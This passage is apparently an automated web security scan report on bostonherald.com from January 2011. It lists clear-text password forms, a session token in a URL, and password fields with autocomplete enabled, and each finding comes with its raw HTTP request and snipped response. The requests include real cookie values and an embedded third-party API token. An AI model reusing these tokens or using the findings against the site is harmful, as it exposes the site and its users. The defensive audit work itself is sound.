Content-Length: 96220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.15. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:43:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.16. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:31:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 96549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.17. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.18. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 92986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.19. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

3.20. http://www.bostonherald.com/users/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

3.21. http://www.bostonherald.com/users/register/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:04:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 29 Jan 2011 02:04:14 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
</script>
<form name="register" action="/users/register/" method="POST" onSubmit="return validateRegistration();">


<div style="width:605px; margin:0 auto; padding:0; overflow:auto">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="password" id="r_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...
<div class="usersFieldInput"><input type="password" value="" name="confirm_password" id="r_confirm_password" class="usersFieldInputBar"/><span style="color: #c00; font-weight:normal">
...[SNIP]...

4. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.bostonherald.com
Path:   /entertainment/movies/

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /entertainment/movies/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<!--//include 8 //-->
           

<script src='http://nmp.newsgator.com/NGBuzz/Buzz.ashx?buzzId=149584&apiToken=2B2E7D0407C94C67BA38AB2091B68BCD&mode=production&aid=bostonher&zip=02118&radius=5&units=mi&country=USA&trkM=AB137F30-E300-46C0-881C-286B26F890DA'></script>
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 21 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:20:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79220

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

5.2. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:11:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 94735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<div id="CommentPostAreaRegInner">
<form name="register" method="POST" action="#comment_form"

onSubmit="if (!register_validate()) { return false; } else { register_user(); return false; }">



<div style="text-align:right; font-size:11px; margin-bottom:15px; color:#555">
...[SNIP]...
<span class="right"><input type="password" value="" name="password" id="r_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...
<span class="right"><input type="password" value="" name="confirm_password" id="r_confirm_password" style="width:150px;"/><span style="color:#c00; font-size:13px;">
...[SNIP]...

